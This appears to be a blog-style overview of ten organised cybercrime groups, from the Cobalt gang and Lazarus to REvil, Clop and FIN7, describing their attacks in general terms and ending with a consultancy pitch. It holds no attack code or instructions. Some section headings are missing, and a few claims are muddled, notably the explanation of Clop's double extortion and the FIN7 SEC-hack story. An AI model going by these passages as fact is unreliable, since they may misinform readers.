Cybercrime has become so widespread and lucrative that well-organized groups of cybercriminals collaborate to carry out large-scale online heists. These cybercrime gangs consist of hackers, developers, and other tech outlaws who pool their expertise and resources to perform massive crimes that would otherwise be impossible to carry out.
In this article, we’ll be discussing ten of the most notorious organized cybercrime syndicates and how they operate.
Traditional Organized Crime vs. Cybercriminal Hacking Groups
Traditional organized crime and cybercrime have historically been two separate divisions. However, one overarching message emerges from Europol’s Serious and Organized Crime Threat Assessment 2017: organized crime has gone digital, erasing the distinction between the two.
Hackers infiltrating computer networks for the sake of amusement or glory are no longer the norm in the present era of cybercrime. The digital economy’s growth and expansion have radically altered the criminal landscape.
Cybercriminals seek to join with criminal bosses who have the vision, power, and connections to carry out complicated, far-reaching schemes and hacks, much like traditional organized crime does. These cybercriminal kingpins are only becoming better at what they’re doing.
The activities and business models of these global cybercrime syndicates are patterned after legitimate businesses. Security analysts believe they are educating new recruits, using collaborative programs, and even employing service agreements amongst the experts they hire.
Organized Cybercrime Activities
Hacking, fraud, creation, and distribution of malware, DDoS assaults, extortion, and intellectual property theft are just a few of the cybercrimes that cyber-organized criminals have committed. Cybercrime of this nature results in financial, psychological, social, and sometimes bodily harm, and they’ve also been used to support other major crimes like terrorism.
Criminal organizations that participate in cybercrime also offer services that aid in the commission of crimes and cybercrime (crime as a service), such as:
- Stolen data and identity documents (including but not limited to voter registration identifications, health and financial data, and passports)
- Botnet services
- Distributed denial of service (DDoS) attacks
- Phishing or spear-phishing tools
- Hacking tutorials
- Information on flaws and vulnerabilities, as well as directions on how to abuse them
According to Europol, ransomware remains a high-value focus for criminal groups, with crypto mining malware entering the fray as a less risky alternative. Card skimming is still a popular way for gangs to make money, and many old scams, including advanced-fee fraud, technical support, and romance scams, continue to victimize a substantial number of people. Europol also reports that computer hackers that previously attacked conventional financial institutions are now eyeing businesses and cryptocurrency users.
10 Most Notorious Organized Cybercrime Syndicates
Here are some of the most infamous organized cybercrime groups in history.
1. Cobalt Cybercrime Gang
The Carbanak and Cobalt malware attacks, which attacked 100 financial firms in more than 40 countries around the globe, were carried out by this cybercrime organization. These thieves were able to plunder over $11 million in every heist thanks to their sophisticated cybercrime campaigns targeting multiple banks. It cost the banking sector more than a billion dollars in total losses.
A typical Cobalt assault compromised financial firms by targeting bank personnel using spear-phishing emails with malware attachments. After the malware was downloaded, hackers acquired access to the compromised computer and breached the internal network system. They examined the bank’s processes and routines for months inside the infiltrated networks.
When they began hacking the systems that controlled the ATMs, things became much more horrific. During the final robbery, ATMs were programmed to remotely disburse cash at scheduled intervals at designated points, where a money mule awaited to collect the funds, a technique known as “jackpotting.”
The suspected ringleader was apprehended in 2018, but authorities now believe the surviving members have carried on from where he had left off after witnessing similar attacks on several other institutions immediately after his capture.
2. Lazarus Gang
The Lazarus group, which some suspect is tied to North Korea, is responsible for many heinous cyberattacks on organizations and institutions. The most well-known of them was the Sony Pictures hack in 2014, as well as the insidious WannaCry cyber-attack that crippled England’s NHS (National Health Service).
Sony Pictures Leak
Employees were surprised to learn that their company’s network had been compromised during the notorious Sony Pictures incident. Hackers seized terabytes of sensitive information, destroyed specific files, and threatened to release the data if Sony did not comply with their demands.
For days, systems were offline, and whiteboards had to be used by staff. After a few days, the hackers began exposing classified info that they had stolen to the media.
WannaCry Ransomware Attack
The Lazarus organization is also suspected of being responsible for the WannaCry ransomware assault in 2017, which infected over a quarter-million systems in 150 countries. It devastated several businesses and institutions, such as the NHS in the United Kingdom. It was the worst attack on the NHS in its history.
WannaCry paralyzed the NHS for days, canceling over 6,000 appointments and costing them approximately $100 million.
3. MageCart Syndicate
This large e-commerce hacking ring, which was made up of various gangs operating under a single umbrella, became known for collecting consumer and credit card information. This was accomplished by malware used for software skimming, which intercepted payment services on e-commerce websites and recorded credit card information. Scores of e-commerce platforms, and other sites where customers regularly provide their credit card information, have been attacked by MageCart gangs over the years.
A MageCart group, for example, breached British Airways’ data in 2018. Customers’ financial and personal information was compromised in the incident, which affected 380,000 people. The assault on the airline, however, was only the beginning.
A few days following the British Airways hack, MageCart launched a large credit card skimming operation against hardware vendor Newegg. MageCart is also suspected of being behind the Ticketmaster data breach, which exposed the personal information of 40,000 customers.
4. Evil Corp
The name of the organization alone suggests that they are looking to initiate chaos. This global cybercrime organization, located in Russia, utilizes various viruses to attack a variety of entities, such as a Pennsylvania school system.
Many of their victims are European and American institutions, and they have eluded capture for years. The sophisticated Dridex banking Trojan, which allowed Evil Corp to steal login details from numerous banks and other financial institutions spanning 40 countries, has made the cybercriminal gang famous. Evil Corp was able to steal approximately $100 million at the peak of the Dridex operation.
They’re so brazen that videos of the suspected leaders parading their sportscars and extravagant lifestyles have gone viral. While U.S. authorities legally charged them in December 2019, numerous analysts believe that bringing their leaders to trial in the U.S. will be tough.
The group was unaffected by the charges. Evil Corp has been associated with a series of new assaults against small and medium-sized businesses in the United States in 2020. This involves Symantec’s discovery of a plot to target hundreds of U.S. firms in June 2020. WastedLocker, a new type of ransomware, was used to target eight Fortune 500 firms.
5. GozNym Gang
The terrifying GozNym malware, a potent Trojan hybrid designed to elude discovery by security software, is the work of this worldwide cybercrime network.
GozNym is a two-headed beast that combines Nymaim with Gozi malware. Thanks to the nefarious union, the malware could infiltrate a customer’s PC via malicious email attachments or URLs. The malware then remained practically undetected, lying in wait for a person to log into a bank account.
Login credentials were taken, funds were swiped and routed away to U.S. and overseas accounts, and then money mules laundered it all clean. Over 41,000 machines were hacked, and account holders were defrauded of more than $100 million.
Europol has reported that the perpetrators behind GozNym malware have since been dismantled.
The Colonial Pipeline ransomware operation last May, which halted the U.S. Colonial Pipeline’s fuel distribution system, causing gasoline supply issues, was carried out by DarkSide.
The gang initially appeared in August of last year. It primarily targets being large corporations that will be damaged if their services are disrupted — a crucial factor because they are more inclined to shell out ransom if their services are disrupted. Cyber insurance is more common in such businesses, which implies easy money for crooks.
DarkSide’s business strategy is to provide ransomware services. To put it another way, it executes ransomware assaults in place of other unknown culprits to reduce their culpability. The loot is subsequently split between the executor and the mastermind.
Cybercrime-as-a-service providers also offer online forums for anyone who wants to enhance their hacking capabilities. This might include instructing someone on how to mix DDoS and ransomware assaults to increase the pressure on a negotiation. A ransomware assault would keep a company from acting on previous and present orders, whereas a DDoS attack will prevent any new orders from being placed.
Because of the ongoing Kaseya issue and another recent attack on international meat processing giant JBS, the ransomware-as-a-service outfit REvil has made headlines. This organization has been quite aggressive in 2020 and 2021.
REvil hacked Quanta Computer, a Taiwan business that assembles Apple computers, in April and obtained technical data about upcoming Apple devices. A sum of $50 million has been demanded to stop the public dissemination of the stolen information. It is unknown whether this payment was made.
Clop ransomware was launched in 2019 by a profit-driven gang accountable for stealing half a billion dollars. The Clop group specializes in “double-extortion,” which entails paying a ransom in return for a decryption key that allows the company to regain access to stolen information. On the other hand, victims will have to pay an additional ransom to prevent the data from being made public.
According to historical evidence, companies that have previously paid a ransom are more willing to do so again in the future. As a result, hackers will repeatedly attack the same firms, requesting a larger amount each time.
9. Syrian Electronic Army
The Syrian Electronic Army, unlike most cybercrime gangs, has been waging online attacks to spread political propaganda since 2011. They’ve been labeled a hacktivist organization because of their motivation.
While the organization has ties to Bashar al-, Assad’s dictatorship, it’s most probably composed of online vigilantes attempting to act as a media wing for the Syrian army.
Their strategy is to disseminate fake news via credible outlets. In 2013, they published a single tweet from the official handle of the Associated Press, the world’s largest news organization, that caused the stock market to plummet by billions of dollars.
The Syrian Electronic Army takes advantage of the fact that most online users interpret and respond to information with an inherent trust. They’re also a prime illustration of how the lines between criminal and terrorist organizations online are less clear than in the real world.
FIN7, a Russian-based organization, is possibly the most successful organized cybercrime syndicate in history. It has been in operation since 2012 and primarily serves as a business.
For years, most of its activities went unnoticed. Its security breaches have made use of cross-attack events, in which a cyber-attack is used for several objectives. For instance, it may facilitate ransomware extortion while also enabling the perpetrator to exploit victims’ data by selling it to another party.
In 2017, FIN7 was accused of being behind a cyberattack on corporations that filed documents with the Securities and Exchange Commission in the United States. This private data was exploited and utilized to extort a ransom, which was subsequently invested in the stock market.
As a result, the groups profited handsomely from the trade of classified material. Because the hacking-enabled insider trading scam lasted so long, it’s impossible to calculate the exact measure of financial damage. However, it is believed to be in the billions of dollars.
One of the most critical measures in the battle against organized cybercrime syndicates is understanding how they work. Experts hope that by analyzing them, they will be able to prevent attacks before they occur.
Professionals in the field of cybersecurity can also help. Organizations can gain from cybersecurity experts who can assist them in evaluating their security protocols regularly, recognize potential weaknesses, and devise new ways to protect mission-critical data. Furthermore, cybersecurity consultants can aid in employee education by updating them with the latest hacker avoidance techniques and secure online behaviors.
Need help with cybersecurity? Connect with me.